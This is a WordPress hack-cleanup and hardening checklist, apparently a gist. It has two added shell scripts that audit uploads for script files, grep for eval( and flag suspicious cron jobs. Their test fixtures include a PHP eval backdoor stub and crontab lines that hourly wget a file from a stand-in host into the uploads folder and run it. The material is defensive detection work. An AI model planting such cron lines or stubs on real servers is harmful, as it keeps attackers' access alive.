Hardening WP Security
the full punchlist
A shortened, actionable version of the full punchlist:
- Sync your entire live site down to your local repo
- Change the WordPress default `admin` user + generate a new password
- Remove any users that aren't supposed to be there, or that are no longer in use
- Update WordPress (in case you need to update it manually: https://gist.github.com/ericrasch/4192dc480398a896d4d58b5afe08a1d0)
- Update all WordPress plugins
- Remove unused plugins
- Remove unused themes
- Remove most `.php`/`.php5`/`.html`/`.phtml`/`.txt` files from the `/wp-content/uploads` folder.
- Run `grep -R --exclude="*.js" -e 'eval(' .|cut -c -80` in the command line of the site's root folder to help find evil code
- Add this to the `wp-config.php` file: `define( 'DISALLOW_FILE_EDIT', true );`
- Disable XML-RPC access by adding this plugin to the `/mu-plugins` folder: https://gist.github.com/ericrasch/bda89f60042dd433037b
  - I highly recommend deleting the `/xml-rpc.php` file as an additional step to this
- Add this to your `.htaccess` for additional file security
- Add these `.htaccess` files to both the `/wp-content` and `/wp-includes` folders
- Run this SQL command `UPDATE wp_posts SET ping_status="closed";` in a database editing app like Sequel Pro (but only if you know what you're doing).
- Change the table prefix in the `wp-config.php` file using the iThemes Security plugin
- Install WP-Optimize and clean up the database locally, but there's no need to commit this (or iThemes) to a repo and/or have it exist on a live site (unless you're intending to keep iThemes on your site)
- If you're using the Genesis WordPress Skeleton Framework, run the `genesis:up:mirror` command to automatically sync/delete the hacked files within the `/wp-content/uploads/` folder.
Must do... first thing
- Sync your entire live site down to your local repo to see if there are any new files on the live server that may/may not have been added, indicating your site has been exploited.
  - example files I've personally found were `wp-editor.php` and `.cache.php`
  - If you're using the Genesis WordPress Skeleton Framework, then run `bundle exec cap production genesis:down`
- Change the WordPress default `admin` user + password
  - create another Super Admin user
    - If you're running your site as a company, use `companyname_admin` for the username and `contact+sitedomainwithextension@companyname.com` for the email (Staff Writers will work for a name and Staff as a nickname; just make sure you know what's being displayed publicly) and generate a password
  - login as that user
  - delete the base `admin` user and auto-reassign all Posts/Pages from that user to the new admin user you just created
  - If your company keeps track of multiple logins for your website(s), be sure to update those records, too.
- Go to your WordPress admin panel and remove any admin/editor users that aren't supposed to be there, or that are no longer in use.
- Re-run the WordPress update tool (to overwrite all the files with a clean copy)
  - If you're using the Genesis WordPress Skeleton Framework, then run `yo` to install the latest version of WordPress through Yeoman.
- Update all WordPress plugins. To see if an installed plugin has a known vulnerability, use the following plugins to check them:
- Remove unused plugins. Hackers can still exploit files/issues within inactive plugins.
- Remove unused themes. Hackers can still exploit files/issues within inactive themes.
- Remove most `.php`/`.php5`/`.html`/`.phtml`/`.txt` files from the `/wp-content/uploads` folder. There's generally only one `index.php` in that folder.
- Run `grep -R --exclude="*.js" -e 'eval(' .|cut -c -80` in the command line of the site's root folder to help find evil code (source: http://halfelf.org/2013/evaluating-evil/ which also gives a good snapshot of a clean WP install)
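The two file checks above (script-type files left in `/wp-content/uploads`, and `eval(` outside JavaScript) as one runnable audit script. This is an added example, not code from the gist; the sample site tree it builds is constructed so the script runs offline, and the path arguments are assumptions.

```shell
#!/bin/sh
# Added example (not from the gist): audit a WordPress root for two things the
# checklist calls out: script-type files in wp-content/uploads (only index.php
# is expected there) and eval( calls in non-JS files anywhere under the root.
# Usage: wp_audit /path/to/site-root
set -u

# List files in uploads whose extension suggests executable code, except the
# single index.php WordPress places there. Output: one path per line.
suspicious_uploads() {
    root=$1
    find "$root/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.php5' -o -name '*.html' \
           -o -name '*.phtml' -o -name '*.txt' \) \
        ! -path "$root/wp-content/uploads/index.php" | sort
}

# Same search the gist runs, but without the 80-column cut: report file:line
# for every eval( outside JavaScript files. Output: one match per line.
eval_hits() {
    root=$1
    grep -R -n --exclude='*.js' -e 'eval(' "$root" 2>/dev/null | sort
}

wp_audit() {
    root=$1
    echo "== script-type files in uploads =="
    suspicious_uploads "$root"
    echo "== eval( outside .js =="
    eval_hits "$root"
}

# Constructed sample tree (not real data) so the script runs offline;
# prints the temp directory it created.
make_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/wp-content/uploads/2015" "$site/wp-content/themes/t"
    echo '<?php // Silence is golden' > "$site/wp-content/uploads/index.php"
    echo '<?php eval($payload);' > "$site/wp-content/uploads/2015/.cache.php"
    echo 'just a picture' > "$site/wp-content/uploads/2015/photo.jpg"
    echo 'var f = eval("1+1");' > "$site/wp-content/themes/t/app.js"
    echo '<?php echo "clean";' > "$site/wp-content/themes/t/functions.php"
    echo "$site"
}

if [ $# -gt 0 ]; then
    wp_audit "$1"
fi
```

Run it against the sample tree with `wp_audit "$(make_sample_site)"`; the only hits should be the constructed `.cache.php`, while the `eval` inside `app.js` is skipped as the gist's command intends.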
Second steps
- Scan your site/database with the following plugins:
- Disallow file edits from within a theme
  - add this to the `wp-config.php` file: `define( 'DISALLOW_FILE_EDIT', true );`
- Disable XML-RPC access
  - check if it's enabled on your site here: http://xmlrpc.eritreo.it/
  - combine the 2 existing WP plugins for disabling this into one and add it as a new plugin to the `/mu-plugins` folder
- If you're not using the Genesis WordPress Skeleton Framework, then do the following:
  - Edit your `.htaccess` for additional file security by using the Solid Base `.htaccess`
    - be sure to change line #101 `CHANGETHENAMEOFYOURWEBSITEHERE.com` where you need to reference your own website's domain
  - Add these `.htaccess` files to both the `/wp-content` and `/wp-includes` folders
If you have the time/skill to mess with the database
- change the db username + password
- block old posts from trackback spammers:
  - run this SQL command: `UPDATE wp_posts SET ping_status="closed";`
- change the table prefix in the `wp-config.php` file: `$table_prefix = 'wp_';`
  - consider installing the iThemes Security plugin to change this automatically
- look for malicious cron jobs running on your server
  - one cron job we found recreated the `.cache.php` file every hour at 00:27 minutes, so just deleting the file wasn't enough
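A small triage filter for the cron-job check above, as an added example that is not part of the gist: it reads crontab text (for instance the output of `crontab -l`, `/etc/crontab` and `/etc/cron.d/*`) and prints any job that references a path under the web root or pulls content with `wget`/`curl`. The crontab listing and the `/var/www/site` web root are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the gist): flag cron entries worth a human look after
# a compromise. A job that rewrites a file under the web root is exactly how
# the .cache.php file described above kept coming back.
set -u

# Args: web root path; crontab text on stdin.
# Output: non-comment lines that mention the web root, or that invoke
# wget/curl to fetch remote content. Nothing printed means nothing flagged.
suspicious_cron_lines() {
    webroot=$1
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' \
        | grep -E -e "$webroot" -e '(^|[^[:alnum:]])(wget|curl)[[:space:]]'
}

# Constructed crontab listing (not real data): two normal jobs mixed with two
# that re-create a file under the uploads folder every hour at minute 27.
SAMPLE_CRONTAB='# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
27 * * * * /usr/bin/php /var/www/site/wp-content/uploads/.cache.php >/dev/null 2>&1
27 * * * * wget -q -O /var/www/site/wp-content/uploads/.cache.php http://example.invalid/c
0 0 * * 0 /usr/sbin/logrotate /etc/logrotate.conf'

# Number of flagged lines in the sample for a given web root (for checking).
count_suspicious() {
    printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines "$1" | wc -l | tr -d ' '
}

if [ $# -gt 0 ]; then
    printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines "$1"
fi
```

On a real server, pipe the actual listings in instead: `crontab -l -u www-data | suspicious_cron_lines /var/www/site`.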
Untested, but recommended
- Change permissions on core files:
  - `chmod` `.htaccess` to 444
  - `chmod` `wp-config.php` to 400
- Consider enabling Two-Factor Authentication
Further Steps
- Scan your live site through Sucuri's SiteCheck: https://sitecheck.sucuri.net/
- Consider adding the WP-SpamShield Anti-Spam plugin
  - This plugin is good, but it adds another `.js` script on the front-end of your website. I didn't like that, so I'm not going to use this plugin.
- Read the following for sources:
Plugins that helped:
- Sucuri Security
- Total Security
- Gauntlet Security
- BulletProof Security
- Site Protection
- iThemes Security plugin
- Plugin Security Scanner
  - this plugin duplicated some of the functions from other plugins listed above
- WP-Optimize
  - while not a security plugin, this one will help clean out comment spam and such
Plugins that didn't help:
Some of these worked just fine, but they required more digging to find out the actual issues on the site and/or were handled better by the plugins listed above. Others required you to create an account to even begin to use them.
Hi @ericrasch.
We always try to keep our plugins as helpful as possible (but not bloated with unneeded features), so we wonder, can you share a bit more details on why our plugin "WPSecureOps Easy Firewall" was not working for you? :)
Thanks!
WPSecureOps Team